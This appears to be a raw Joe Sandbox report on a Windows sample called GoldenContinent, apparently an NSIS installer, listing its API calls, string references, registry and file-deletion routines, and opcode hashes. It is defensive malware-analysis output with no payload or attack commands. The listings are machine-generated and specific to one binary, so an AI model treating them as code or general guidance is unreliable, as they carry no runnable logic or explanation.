                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
• SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
Memory Dump Source
• Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
Memory Dump Source
• Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
APIs
• GetDlgItem.USER32(?,000003F9), ref: 004049BF
• GetDlgItem.USER32(?,00000408), ref: 004049CC
• GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
• LoadBitmapW.USER32(0000006E), ref: 00404A2E
• SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
• ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
• SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
• DeleteObject.GDI32(?), ref: 00404AA5
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
• SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
• GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
• ShowWindow.USER32(?,00000005), ref: 00404BFB
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
• ImageList_Destroy.COMCTL32(?), ref: 00404DC8
• GlobalFree.KERNEL32(?), ref: 00404DD8
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
• SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
• InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
• ShowWindow.USER32(?,00000000), ref: 00404F75
• GetDlgItem.USER32(?,000003FE), ref: 00404F80
• ShowWindow.USER32(00000000), ref: 00404F87
Strings
Memory Dump Source
• Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                            • String ID: $ @$M$N
                                                                                                                                                                                                                                                                            • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                            • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                            • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                            • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                            • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                            • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                            • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                            • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                            • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                            • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                            • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                            • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                              • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                              • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00429E6D,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                            • String ID: F$A
                                                                                                                                                                                                                                                                            • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                            • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                            • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                            • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                            • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                            • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                            • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00429E6D,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00429E6D,74DF23A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                            • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                            • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                            • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                            • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateInstance
                                                                                                                                                                                                                                                                            • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                            • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                            • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                            • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
• lstrlenW.KERNEL32(?), ref: 004063F8
• GetVersionExW.KERNEL32(?), ref: 00406456
  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
• LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
• FreeLibrary.KERNEL32(00000000), ref: 00406500
• GlobalFree.KERNEL32(?), ref: 00406509
Similarity
• API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
• String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
• API String ID: 20674999-2124804629
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
• GetDlgItem.USER32(?,000003E8), ref: 004041AD
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
• GetSysColor.USER32(?), ref: 004041DB
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
• lstrlenW.KERNEL32(?), ref: 00404202
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
  • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
• GetDlgItem.USER32(?,0000040A), ref: 00404276
• SendMessageW.USER32(00000000), ref: 0040427D
• GetDlgItem.USER32(?,000003E8), ref: 004042AA
• SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
• LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
• SetCursor.USER32(00000000), ref: 004042FE
• ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
• LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
• SetCursor.USER32(00000000), ref: 00404322
• SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                            • String ID: F$N$open
                                                                                                                                                                                                                                                                            • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                              • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                              • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                            • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                            • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                            • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                            • String ID: F
                                                                                                                                                                                                                                                                            • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                            • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
